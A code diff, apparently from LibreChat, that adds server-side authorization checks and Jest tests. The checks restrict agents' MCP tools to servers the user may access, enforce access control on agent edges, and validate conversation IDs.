jest.fn(), +})); + +jest.mock('~/cache', () => ({ + getLogStores: jest.fn(() => ({ + get: jest.fn(), + set: jest.fn(), + delete: jest.fn(), + })), +})); + +const { + filterAuthorizedTools, + createAgent: createAgentHandler, + updateAgent: updateAgentHandler, + duplicateAgent: duplicateAgentHandler, + revertAgentVersion: revertAgentVersionHandler, +} = require('./v1'); + +const { getMCPServersRegistry } = require('~/config'); + +let Agent; + +describe('MCP Tool Authorization', () => { + let mongoServer; + let mockReq; + let mockRes; + + beforeAll(async () => { + mongoServer = await MongoMemoryServer.create(); + const mongoUri = mongoServer.getUri(); + await mongoose.connect(mongoUri); + Agent = mongoose.models.Agent || mongoose.model('Agent', agentSchema); + }, 20000); + + 
afterAll(async () => { + await mongoose.disconnect(); + await mongoServer.stop(); + }); + + beforeEach(async () => { + await Agent.deleteMany({}); + jest.clearAllMocks(); + + getMCPServersRegistry.mockImplementation(() => ({ + getAllServerConfigs: mockGetAllServerConfigs, + })); + mockGetAllServerConfigs.mockResolvedValue({ + authorizedServer: { type: 'sse', url: 'https://authorized.example.com' }, + anotherServer: { type: 'sse', url: 'https://another.example.com' }, + }); + + mockReq = { + user: { + id: new mongoose.Types.ObjectId().toString(), + role: 'USER', + }, + body: {}, + params: {}, + query: {}, + app: { locals: { fileStrategy: 'local' } }, + }; + + mockRes = { + status: jest.fn().mockReturnThis(), + json: jest.fn().mockReturnThis(), + }; + }); + + describe('filterAuthorizedTools', () => { + const availableTools = { web_search: true, custom_tool: true }; + const userId = 'test-user-123'; + + test('should keep authorized MCP tools and strip unauthorized ones', async () => { + const result = await filterAuthorizedTools({ + tools: [`toolA${d}authorizedServer`, `toolB${d}forbiddenServer`, 'web_search'], + userId, + availableTools, + }); + + expect(result).toContain(`toolA${d}authorizedServer`); + expect(result).toContain('web_search'); + expect(result).not.toContain(`toolB${d}forbiddenServer`); + }); + + test('should keep system tools without querying MCP registry', async () => { + const result = await filterAuthorizedTools({ + tools: ['execute_code', 'file_search', 'web_search'], + userId, + availableTools: {}, + }); + + expect(result).toEqual(['execute_code', 'file_search', 'web_search']); + expect(mockGetAllServerConfigs).not.toHaveBeenCalled(); + }); + + test('should not query MCP registry when no MCP tools are present', async () => { + const result = await filterAuthorizedTools({ + tools: ['web_search', 'custom_tool'], + userId, + availableTools, + }); + + expect(result).toEqual(['web_search', 'custom_tool']); + 
expect(mockGetAllServerConfigs).not.toHaveBeenCalled(); + }); + + test('should filter all MCP tools when registry is uninitialized', async () => { + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + const result = await filterAuthorizedTools({ + tools: [`toolA${d}someServer`, 'web_search'], + userId, + availableTools, + }); + + expect(result).toEqual(['web_search']); + expect(result).not.toContain(`toolA${d}someServer`); + }); + + test('should handle mixed authorized and unauthorized MCP tools', async () => { + const result = await filterAuthorizedTools({ + tools: [ + 'web_search', + `search${d}authorizedServer`, + `attack${d}victimServer`, + 'execute_code', + `list${d}anotherServer`, + `steal${d}nonexistent`, + ], + userId, + availableTools, + }); + + expect(result).toEqual([ + 'web_search', + `search${d}authorizedServer`, + 'execute_code', + `list${d}anotherServer`, + ]); + }); + + test('should handle empty tools array', async () => { + const result = await filterAuthorizedTools({ + tools: [], + userId, + availableTools, + }); + + expect(result).toEqual([]); + expect(mockGetAllServerConfigs).not.toHaveBeenCalled(); + }); + + test('should handle null/undefined tool entries gracefully', async () => { + const result = await filterAuthorizedTools({ + tools: [null, undefined, '', 'web_search'], + userId, + availableTools, + }); + + expect(result).toEqual(['web_search']); + }); + + test('should call getAllServerConfigs with the correct userId', async () => { + await filterAuthorizedTools({ + tools: [`tool${d}authorizedServer`], + userId: 'specific-user-id', + availableTools, + }); + + expect(mockGetAllServerConfigs).toHaveBeenCalledWith('specific-user-id'); + }); + + test('should only call getAllServerConfigs once even with multiple MCP tools', async () => { + await filterAuthorizedTools({ + tools: [`tool1${d}authorizedServer`, `tool2${d}anotherServer`, `tool3${d}unknownServer`], + userId, + 
availableTools, + }); + + expect(mockGetAllServerConfigs).toHaveBeenCalledTimes(1); + }); + + test('should preserve existing MCP tools when registry is unavailable', async () => { + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + const existingTools = [`toolA${d}serverA`, `toolB${d}serverB`]; + + const result = await filterAuthorizedTools({ + tools: [...existingTools, `newTool${d}unknownServer`, 'web_search'], + userId, + availableTools, + existingTools, + }); + + expect(result).toContain(`toolA${d}serverA`); + expect(result).toContain(`toolB${d}serverB`); + expect(result).toContain('web_search'); + expect(result).not.toContain(`newTool${d}unknownServer`); + }); + + test('should still reject all MCP tools when registry is unavailable and no existingTools', async () => { + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + const result = await filterAuthorizedTools({ + tools: [`toolA${d}serverA`, 'web_search'], + userId, + availableTools, + }); + + expect(result).toEqual(['web_search']); + }); + + test('should not preserve malformed existing tools when registry is unavailable', async () => { + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + const malformedTool = `a${d}b${d}c`; + const result = await filterAuthorizedTools({ + tools: [malformedTool, `legit${d}serverA`, 'web_search'], + userId, + availableTools, + existingTools: [malformedTool, `legit${d}serverA`], + }); + + expect(result).toContain(`legit${d}serverA`); + expect(result).toContain('web_search'); + expect(result).not.toContain(malformedTool); + }); + + test('should reject malformed MCP tool keys with multiple delimiters', async () => { + const result = await filterAuthorizedTools({ + tools: [ + `attack${d}victimServer${d}authorizedServer`, + `legit${d}authorizedServer`, + 
`a${d}b${d}c${d}d`, + 'web_search', + ], + userId, + availableTools, + }); + + expect(result).toEqual([`legit${d}authorizedServer`, 'web_search']); + expect(result).not.toContainEqual(expect.stringContaining('victimServer')); + expect(result).not.toContainEqual(expect.stringContaining(`a${d}b`)); + }); + }); + + describe('createAgentHandler - MCP tool authorization', () => { + test('should strip unauthorized MCP tools on create', async () => { + mockReq.body = { + provider: 'openai', + model: 'gpt-4', + name: 'MCP Test Agent', + tools: ['web_search', `validTool${d}authorizedServer`, `attack${d}forbiddenServer`], + }; + + await createAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(201); + const agent = mockRes.json.mock.calls[0][0]; + expect(agent.tools).toContain('web_search'); + expect(agent.tools).toContain(`validTool${d}authorizedServer`); + expect(agent.tools).not.toContain(`attack${d}forbiddenServer`); + }); + + test('should not 500 when MCP registry is uninitialized', async () => { + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + mockReq.body = { + provider: 'openai', + model: 'gpt-4', + name: 'MCP Uninitialized Test', + tools: [`tool${d}someServer`, 'web_search'], + }; + + await createAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(201); + const agent = mockRes.json.mock.calls[0][0]; + expect(agent.tools).toEqual(['web_search']); + }); + + test('should store mcpServerNames only for authorized servers', async () => { + mockReq.body = { + provider: 'openai', + model: 'gpt-4', + name: 'MCP Names Test', + tools: [`toolA${d}authorizedServer`, `toolB${d}forbiddenServer`], + }; + + await createAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(201); + const agent = mockRes.json.mock.calls[0][0]; + const agentInDb = await Agent.findOne({ id: agent.id }); + 
expect(agentInDb.mcpServerNames).toContain('authorizedServer'); + expect(agentInDb.mcpServerNames).not.toContain('forbiddenServer'); + }); + }); + + describe('updateAgentHandler - MCP tool authorization', () => { + let existingAgentId; + let existingAgentAuthorId; + + beforeEach(async () => { + existingAgentAuthorId = new mongoose.Types.ObjectId(); + const agent = await Agent.create({ + id: `agent_${uuidv4()}`, + name: 'Original Agent', + provider: 'openai', + model: 'gpt-4', + author: existingAgentAuthorId, + tools: ['web_search', `existingTool${d}authorizedServer`], + mcpServerNames: ['authorizedServer'], + versions: [ + { + name: 'Original Agent', + provider: 'openai', + model: 'gpt-4', + tools: ['web_search', `existingTool${d}authorizedServer`], + createdAt: new Date(), + updatedAt: new Date(), + }, + ], + }); + existingAgentId = agent.id; + }); + + test('should preserve existing MCP tools even if editor lacks access', async () => { + mockGetAllServerConfigs.mockResolvedValue({}); + + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { + tools: ['web_search', `existingTool${d}authorizedServer`], + }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const updatedAgent = mockRes.json.mock.calls[0][0]; + expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`); + expect(updatedAgent.tools).toContain('web_search'); + }); + + test('should reject newly added unauthorized MCP tools', async () => { + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { + tools: ['web_search', `existingTool${d}authorizedServer`, `attack${d}forbiddenServer`], + }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const updatedAgent = mockRes.json.mock.calls[0][0]; + expect(updatedAgent.tools).toContain('web_search'); + 
expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`); + expect(updatedAgent.tools).not.toContain(`attack${d}forbiddenServer`); + }); + + test('should allow adding authorized MCP tools', async () => { + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { + tools: ['web_search', `existingTool${d}authorizedServer`, `newTool${d}anotherServer`], + }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const updatedAgent = mockRes.json.mock.calls[0][0]; + expect(updatedAgent.tools).toContain(`newTool${d}anotherServer`); + }); + + test('should not query MCP registry when no new MCP tools added', async () => { + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { + tools: ['web_search', `existingTool${d}authorizedServer`], + }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockGetAllServerConfigs).not.toHaveBeenCalled(); + }); + + test('should preserve existing MCP tools when registry unavailable and user edits agent', async () => { + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { + name: 'Renamed After Restart', + tools: ['web_search', `existingTool${d}authorizedServer`], + }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const updatedAgent = mockRes.json.mock.calls[0][0]; + expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`); + expect(updatedAgent.tools).toContain('web_search'); + expect(updatedAgent.name).toBe('Renamed After Restart'); + }); + + test('should preserve existing MCP tools when server not in configs (disconnected)', async () => { + mockGetAllServerConfigs.mockResolvedValue({}); + + mockReq.user.id = 
existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { + name: 'Edited While Disconnected', + tools: ['web_search', `existingTool${d}authorizedServer`], + }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const updatedAgent = mockRes.json.mock.calls[0][0]; + expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`); + expect(updatedAgent.name).toBe('Edited While Disconnected'); + }); + }); + + describe('duplicateAgentHandler - MCP tool authorization', () => { + let sourceAgentId; + let sourceAgentAuthorId; + + beforeEach(async () => { + sourceAgentAuthorId = new mongoose.Types.ObjectId(); + const agent = await Agent.create({ + id: `agent_${uuidv4()}`, + name: 'Source Agent', + provider: 'openai', + model: 'gpt-4', + author: sourceAgentAuthorId, + tools: ['web_search', `tool${d}authorizedServer`, `tool${d}forbiddenServer`], + mcpServerNames: ['authorizedServer', 'forbiddenServer'], + versions: [ + { + name: 'Source Agent', + provider: 'openai', + model: 'gpt-4', + tools: ['web_search', `tool${d}authorizedServer`, `tool${d}forbiddenServer`], + createdAt: new Date(), + updatedAt: new Date(), + }, + ], + }); + sourceAgentId = agent.id; + }); + + test('should strip unauthorized MCP tools from duplicated agent', async () => { + mockGetAllServerConfigs.mockResolvedValue({ + authorizedServer: { type: 'sse' }, + }); + + mockReq.user.id = sourceAgentAuthorId.toString(); + mockReq.params.id = sourceAgentId; + + await duplicateAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(201); + const { agent: newAgent } = mockRes.json.mock.calls[0][0]; + expect(newAgent.id).not.toBe(sourceAgentId); + expect(newAgent.tools).toContain('web_search'); + expect(newAgent.tools).toContain(`tool${d}authorizedServer`); + expect(newAgent.tools).not.toContain(`tool${d}forbiddenServer`); + + const agentInDb = await Agent.findOne({ id: newAgent.id }); + 
expect(agentInDb.mcpServerNames).toContain('authorizedServer'); + expect(agentInDb.mcpServerNames).not.toContain('forbiddenServer'); + }); + + test('should preserve source agent MCP tools when registry is unavailable', async () => { + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + mockReq.user.id = sourceAgentAuthorId.toString(); + mockReq.params.id = sourceAgentId; + + await duplicateAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(201); + const { agent: newAgent } = mockRes.json.mock.calls[0][0]; + expect(newAgent.tools).toContain('web_search'); + expect(newAgent.tools).toContain(`tool${d}authorizedServer`); + expect(newAgent.tools).toContain(`tool${d}forbiddenServer`); + }); + }); + + describe('revertAgentVersionHandler - MCP tool authorization', () => { + let existingAgentId; + let existingAgentAuthorId; + + beforeEach(async () => { + existingAgentAuthorId = new mongoose.Types.ObjectId(); + const agent = await Agent.create({ + id: `agent_${uuidv4()}`, + name: 'Reverted Agent V2', + provider: 'openai', + model: 'gpt-4', + author: existingAgentAuthorId, + tools: ['web_search'], + versions: [ + { + name: 'Reverted Agent V1', + provider: 'openai', + model: 'gpt-4', + tools: ['web_search', `oldTool${d}revokedServer`], + createdAt: new Date(Date.now() - 10000), + updatedAt: new Date(Date.now() - 10000), + }, + { + name: 'Reverted Agent V2', + provider: 'openai', + model: 'gpt-4', + tools: ['web_search'], + createdAt: new Date(), + updatedAt: new Date(), + }, + ], + }); + existingAgentId = agent.id; + }); + + test('should strip unauthorized MCP tools after reverting to a previous version', async () => { + mockGetAllServerConfigs.mockResolvedValue({ + authorizedServer: { type: 'sse' }, + }); + + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { version_index: 0 }; + + await 
revertAgentVersionHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const result = mockRes.json.mock.calls[0][0]; + expect(result.tools).toContain('web_search'); + expect(result.tools).not.toContain(`oldTool${d}revokedServer`); + + const agentInDb = await Agent.findOne({ id: existingAgentId }); + expect(agentInDb.tools).toContain('web_search'); + expect(agentInDb.tools).not.toContain(`oldTool${d}revokedServer`); + }); + + test('should keep authorized MCP tools after revert', async () => { + await Agent.updateOne( + { id: existingAgentId }, + { $set: { 'versions.0.tools': ['web_search', `tool${d}authorizedServer`] } }, + ); + + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { version_index: 0 }; + + await revertAgentVersionHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const result = mockRes.json.mock.calls[0][0]; + expect(result.tools).toContain('web_search'); + expect(result.tools).toContain(`tool${d}authorizedServer`); + }); + + test('should preserve version MCP tools when registry is unavailable on revert', async () => { + await Agent.updateOne( + { id: existingAgentId }, + { + $set: { + 'versions.0.tools': [ + 'web_search', + `validTool${d}authorizedServer`, + `otherTool${d}anotherServer`, + ], + }, + }, + ); + + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { version_index: 0 }; + + await revertAgentVersionHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const result = mockRes.json.mock.calls[0][0]; + expect(result.tools).toContain('web_search'); + expect(result.tools).toContain(`validTool${d}authorizedServer`); + expect(result.tools).toContain(`otherTool${d}anotherServer`); + + const agentInDb = await Agent.findOne({ id: existingAgentId }); 
+ expect(agentInDb.tools).toContain(`validTool${d}authorizedServer`); + expect(agentInDb.tools).toContain(`otherTool${d}anotherServer`); + }); + }); +}); diff --git a/api/server/controllers/agents/openai.js b/api/server/controllers/agents/openai.js index e8561f15fe..189cb29d8d 100644 --- a/api/server/controllers/agents/openai.js +++ b/api/server/controllers/agents/openai.js @@ -26,7 +26,7 @@ const { createToolEndCallback } = require('~/server/controllers/agents/callbacks const { findAccessibleResources } = require('~/server/services/PermissionService'); const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens'); const { getMultiplier, getCacheMultiplier } = require('~/models/tx'); -const { getConvoFiles } = require('~/models/Conversation'); +const { getConvoFiles, getConvo } = require('~/models/Conversation'); const { getAgent, getAgents } = require('~/models/Agent'); const db = require('~/models'); @@ -151,8 +151,6 @@ const OpenAIChatCompletionController = async (req, res) => { } const responseId = `chatcmpl-${nanoid()}`; - const conversationId = request.conversation_id ?? nanoid(); - const parentMessageId = request.parent_message_id ?? null; const created = Math.floor(Date.now() / 1000); /** @type {import('@librechat/api').OpenAIResponseContext} — key must be `requestId` to match the type used by createChunk/buildNonStreamingResponse */ @@ -178,6 +176,23 @@ const OpenAIChatCompletionController = async (req, res) => { }); try { + if (request.conversation_id != null) { + if (typeof request.conversation_id !== 'string') { + return sendErrorResponse( + res, + 400, + 'conversation_id must be a string', + 'invalid_request_error', + ); + } + if (!(await getConvo(req.user?.id, request.conversation_id))) { + return sendErrorResponse(res, 404, 'Conversation not found', 'invalid_request_error'); + } + } + + const conversationId = request.conversation_id ?? nanoid(); + const parentMessageId = request.parent_message_id ?? 
null; + // Build allowed providers set const allowedProviders = new Set( appConfig?.endpoints?.[EModelEndpoint.agents]?.allowedProviders, @@ -265,6 +280,7 @@ const OpenAIChatCompletionController = async (req, res) => { toolRegistry: primaryConfig.toolRegistry, userMCPAuthMap: primaryConfig.userMCPAuthMap, tool_resources: primaryConfig.tool_resources, + actionsEnabled: primaryConfig.actionsEnabled, }); }, toolEndCallback, diff --git a/api/server/controllers/agents/responses.js b/api/server/controllers/agents/responses.js index 83e6ad6efd..30ccacdba8 100644 --- a/api/server/controllers/agents/responses.js +++ b/api/server/controllers/agents/responses.js @@ -292,10 +292,6 @@ const createResponse = async (req, res) => { // Generate IDs const responseId = generateResponseId(); - const conversationId = request.previous_response_id ?? uuidv4(); - const parentMessageId = null; - - // Create response context const context = createResponseContext(request, responseId); logger.debug( @@ -314,6 +310,23 @@ const createResponse = async (req, res) => { }); try { + if (request.previous_response_id != null) { + if (typeof request.previous_response_id !== 'string') { + return sendResponsesErrorResponse( + res, + 400, + 'previous_response_id must be a string', + 'invalid_request', + ); + } + if (!(await getConvo(req.user?.id, request.previous_response_id))) { + return sendResponsesErrorResponse(res, 404, 'Conversation not found', 'not_found'); + } + } + + const conversationId = request.previous_response_id ?? 
uuidv4(); + const parentMessageId = null; + // Build allowed providers set const allowedProviders = new Set( appConfig?.endpoints?.[EModelEndpoint.agents]?.allowedProviders, @@ -429,6 +442,7 @@ const createResponse = async (req, res) => { toolRegistry: primaryConfig.toolRegistry, userMCPAuthMap: primaryConfig.userMCPAuthMap, tool_resources: primaryConfig.tool_resources, + actionsEnabled: primaryConfig.actionsEnabled, }); }, toolEndCallback, @@ -586,6 +600,7 @@ const createResponse = async (req, res) => { toolRegistry: primaryConfig.toolRegistry, userMCPAuthMap: primaryConfig.userMCPAuthMap, tool_resources: primaryConfig.tool_resources, + actionsEnabled: primaryConfig.actionsEnabled, }); }, toolEndCallback, diff --git a/api/server/controllers/agents/v1.js b/api/server/controllers/agents/v1.js index a2c0d55186..309873e56c 100644 --- a/api/server/controllers/agents/v1.js +++ b/api/server/controllers/agents/v1.js @@ -6,6 +6,7 @@ const { agentCreateSchema, agentUpdateSchema, refreshListAvatars, + collectEdgeAgentIds, mergeAgentOcrConversion, MAX_AVATAR_REFRESH_AGENTS, convertOcrToContextInPlace, @@ -35,6 +36,7 @@ const { } = require('~/models/Agent'); const { findPubliclyAccessibleResources, + getResourcePermissionsMap, findAccessibleResources, hasPublicPermission, grantPermission, @@ -47,6 +49,7 @@ const { refreshS3Url } = require('~/server/services/Files/S3/crud'); const { filterFile } = require('~/server/services/Files/process'); const { updateAction, getActions } = require('~/models/Action'); const { getCachedTools } = require('~/server/services/Config'); +const { getMCPServersRegistry } = require('~/config'); const { getLogStores } = require('~/cache'); const systemTools = { @@ -58,6 +61,116 @@ const systemTools = { const MAX_SEARCH_LEN = 100; const escapeRegex = (str = '') => str.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); +/** + * Validates that the requesting user has VIEW access to every agent referenced in edges. 
+ * Agents that do not exist in the database are skipped — at create time, the `from` field + * often references the agent being built, which has no DB record yet. + * @param {import('librechat-data-provider').GraphEdge[]} edges + * @param {string} userId + * @param {string} userRole - Used for group/role principal resolution + * @returns {Promise} Agent IDs the user cannot VIEW (empty if all accessible) + */ +const validateEdgeAgentAccess = async (edges, userId, userRole) => { + const edgeAgentIds = collectEdgeAgentIds(edges); + if (edgeAgentIds.size === 0) { + return []; + } + + const agents = (await Promise.all([...edgeAgentIds].map((id) => getAgent({ id })))).filter( + Boolean, + ); + + if (agents.length === 0) { + return []; + } + + const permissionsMap = await getResourcePermissionsMap({ + userId, + role: userRole, + resourceType: ResourceType.AGENT, + resourceIds: agents.map((a) => a._id), + }); + + return agents + .filter((a) => { + const bits = permissionsMap.get(a._id.toString()) ?? 0; + return (bits & PermissionBits.VIEW) === 0; + }) + .map((a) => a.id); +}; + +/** + * Filters tools to only include those the user is authorized to use. + * MCP tools must match the exact format `{toolName}_mcp_{serverName}` (exactly 2 segments). + * Multi-delimiter keys are rejected to prevent authorization/execution mismatch. + * Non-MCP tools must appear in availableTools (global tool cache) or systemTools. + * + * When `existingTools` is provided and the MCP registry is unavailable (e.g. server restart), + * tools already present on the agent are preserved rather than stripped — they were validated + * when originally added, and we cannot re-verify them without the registry. 
+ * @param {object} params + * @param {string[]} params.tools - Raw tool strings from the request + * @param {string} params.userId - Requesting user ID for MCP server access check + * @param {Record} params.availableTools - Global non-MCP tool cache + * @param {string[]} [params.existingTools] - Tools already persisted on the agent document + * @returns {Promise} Only the authorized subset of tools + */ +const filterAuthorizedTools = async ({ tools, userId, availableTools, existingTools }) => { + const filteredTools = []; + let mcpServerConfigs; + let registryUnavailable = false; + const existingToolSet = existingTools?.length ? new Set(existingTools) : null; + + for (const tool of tools) { + if (availableTools[tool] || systemTools[tool]) { + filteredTools.push(tool); + continue; + } + + if (!tool?.includes(Constants.mcp_delimiter)) { + continue; + } + + if (mcpServerConfigs === undefined) { + try { + mcpServerConfigs = (await getMCPServersRegistry().getAllServerConfigs(userId)) ?? {}; + } catch (e) { + logger.warn( + '[filterAuthorizedTools] MCP registry unavailable, filtering all MCP tools', + e.message, + ); + mcpServerConfigs = {}; + registryUnavailable = true; + } + } + + const parts = tool.split(Constants.mcp_delimiter); + if (parts.length !== 2) { + logger.warn( + `[filterAuthorizedTools] Rejected malformed MCP tool key "${tool}" for user ${userId}`, + ); + continue; + } + + if (registryUnavailable && existingToolSet?.has(tool)) { + filteredTools.push(tool); + continue; + } + + const [, serverName] = parts; + if (!serverName || !Object.hasOwn(mcpServerConfigs, serverName)) { + logger.warn( + `[filterAuthorizedTools] Rejected MCP tool "${tool}" — server "${serverName}" not accessible to user ${userId}`, + ); + continue; + } + + filteredTools.push(tool); + } + + return filteredTools; +}; + /** * Creates an Agent. 
* @route POST /Agents @@ -75,22 +188,24 @@ const createAgentHandler = async (req, res) => { agentData.model_parameters = removeNullishValues(agentData.model_parameters, true); } - const { id: userId } = req.user; + const { id: userId, role: userRole } = req.user; + + if (agentData.edges?.length) { + const unauthorized = await validateEdgeAgentAccess(agentData.edges, userId, userRole); + if (unauthorized.length > 0) { + return res.status(403).json({ + error: 'You do not have access to one or more agents referenced in edges', + agent_ids: unauthorized, + }); + } + } agentData.id = `agent_${nanoid()}`; agentData.author = userId; agentData.tools = []; const availableTools = (await getCachedTools()) ?? {}; - for (const tool of tools) { - if (availableTools[tool]) { - agentData.tools.push(tool); - } else if (systemTools[tool]) { - agentData.tools.push(tool); - } else if (tool.includes(Constants.mcp_delimiter)) { - agentData.tools.push(tool); - } - } + agentData.tools = await filterAuthorizedTools({ tools, userId, availableTools }); const agent = await createAgent(agentData); @@ -243,6 +358,17 @@ const updateAgentHandler = async (req, res) => { updateData.avatar = avatarField; } + if (updateData.edges?.length) { + const { id: userId, role: userRole } = req.user; + const unauthorized = await validateEdgeAgentAccess(updateData.edges, userId, userRole); + if (unauthorized.length > 0) { + return res.status(403).json({ + error: 'You do not have access to one or more agents referenced in edges', + agent_ids: unauthorized, + }); + } + } + // Convert OCR to context in incoming updateData convertOcrToContextInPlace(updateData); @@ -261,6 +387,26 @@ const updateAgentHandler = async (req, res) => { updateData.tools = ocrConversion.tools; } + if (updateData.tools) { + const existingToolSet = new Set(existingAgent.tools ?? 
[]); + const newMCPTools = updateData.tools.filter( + (t) => !existingToolSet.has(t) && t?.includes(Constants.mcp_delimiter), + ); + + if (newMCPTools.length > 0) { + const availableTools = (await getCachedTools()) ?? {}; + const approvedNew = await filterAuthorizedTools({ + tools: newMCPTools, + userId: req.user.id, + availableTools, + }); + const rejectedSet = new Set(newMCPTools.filter((t) => !approvedNew.includes(t))); + if (rejectedSet.size > 0) { + updateData.tools = updateData.tools.filter((t) => !rejectedSet.has(t)); + } + } + } + let updatedAgent = Object.keys(updateData).length > 0 ? await updateAgent({ id }, updateData, { @@ -371,7 +517,7 @@ const duplicateAgentHandler = async (req, res) => { */ const duplicateAction = async (action) => { const newActionId = nanoid(); - const [domain] = action.action_id.split(actionDelimiter); + const { domain } = action.metadata; const fullActionId = `${domain}${actionDelimiter}${newActionId}`; // Sanitize sensitive metadata before persisting @@ -381,7 +527,7 @@ const duplicateAgentHandler = async (req, res) => { } const newAction = await updateAction( - { action_id: newActionId }, + { action_id: newActionId, agent_id: newAgentId }, { metadata: filteredMetadata, agent_id: newAgentId, @@ -403,6 +549,17 @@ const duplicateAgentHandler = async (req, res) => { const agentActions = await Promise.all(promises); newAgentData.actions = agentActions; + + if (newAgentData.tools?.length) { + const availableTools = (await getCachedTools()) ?? 
{}; + newAgentData.tools = await filterAuthorizedTools({ + tools: newAgentData.tools, + userId, + availableTools, + existingTools: newAgentData.tools, + }); + } + const newAgent = await createAgent(newAgentData); try { @@ -731,7 +888,24 @@ const revertAgentVersionHandler = async (req, res) => { // Permissions are enforced via route middleware (ACL EDIT) - const updatedAgent = await revertAgentVersion({ id }, version_index); + let updatedAgent = await revertAgentVersion({ id }, version_index); + + if (updatedAgent.tools?.length) { + const availableTools = (await getCachedTools()) ?? {}; + const filteredTools = await filterAuthorizedTools({ + tools: updatedAgent.tools, + userId: req.user.id, + availableTools, + existingTools: updatedAgent.tools, + }); + if (filteredTools.length !== updatedAgent.tools.length) { + updatedAgent = await updateAgent( + { id }, + { tools: filteredTools }, + { updatingUserId: req.user.id }, + ); + } + } if (updatedAgent.author) { updatedAgent.author = updatedAgent.author.toString(); @@ -799,4 +973,5 @@ module.exports = { uploadAgentAvatar: uploadAgentAvatarHandler, revertAgentVersion: revertAgentVersionHandler, getAgentCategories, + filterAuthorizedTools, }; diff --git a/api/server/controllers/agents/v1.spec.js b/api/server/controllers/agents/v1.spec.js index ce68cc241f..ede4ea416a 100644 --- a/api/server/controllers/agents/v1.spec.js +++ b/api/server/controllers/agents/v1.spec.js @@ -2,7 +2,7 @@ const mongoose = require('mongoose'); const { nanoid } = require('nanoid'); const { v4: uuidv4 } = require('uuid'); const { agentSchema } = require('@librechat/data-schemas'); -const { FileSources } = require('librechat-data-provider'); +const { FileSources, PermissionBits } = require('librechat-data-provider'); const { MongoMemoryServer } = require('mongodb-memory-server'); // Only mock the dependencies that are not database-related @@ -46,9 +46,9 @@ jest.mock('~/models/File', () => ({ jest.mock('~/server/services/PermissionService', () => ({ 
findAccessibleResources: jest.fn().mockResolvedValue([]), findPubliclyAccessibleResources: jest.fn().mockResolvedValue([]), + getResourcePermissionsMap: jest.fn().mockResolvedValue(new Map()), grantPermission: jest.fn(), hasPublicPermission: jest.fn().mockResolvedValue(false), - checkPermission: jest.fn().mockResolvedValue(true), })); jest.mock('~/models', () => ({ @@ -74,6 +74,7 @@ const { const { findAccessibleResources, findPubliclyAccessibleResources, + getResourcePermissionsMap, } = require('~/server/services/PermissionService'); const { refreshS3Url } = require('~/server/services/Files/S3/crud'); @@ -1647,4 +1648,112 @@ describe('Agent Controllers - Mass Assignment Protection', () => { expect(agent.avatar.filepath).toBe('old-s3-path.jpg'); }); }); + + describe('Edge ACL validation', () => { + let targetAgent; + + beforeEach(async () => { + targetAgent = await Agent.create({ + id: `agent_${nanoid()}`, + author: new mongoose.Types.ObjectId().toString(), + name: 'Target Agent', + provider: 'openai', + model: 'gpt-4', + tools: [], + }); + }); + + test('createAgentHandler should return 403 when user lacks VIEW on an edge-referenced agent', async () => { + const permMap = new Map(); + getResourcePermissionsMap.mockResolvedValueOnce(permMap); + + mockReq.body = { + name: 'Attacker Agent', + provider: 'openai', + model: 'gpt-4', + edges: [{ from: 'self_placeholder', to: targetAgent.id, edgeType: 'handoff' }], + }; + + await createAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(403); + const response = mockRes.json.mock.calls[0][0]; + expect(response.agent_ids).toContain(targetAgent.id); + }); + + test('createAgentHandler should succeed when user has VIEW on all edge-referenced agents', async () => { + const permMap = new Map([[targetAgent._id.toString(), 1]]); + 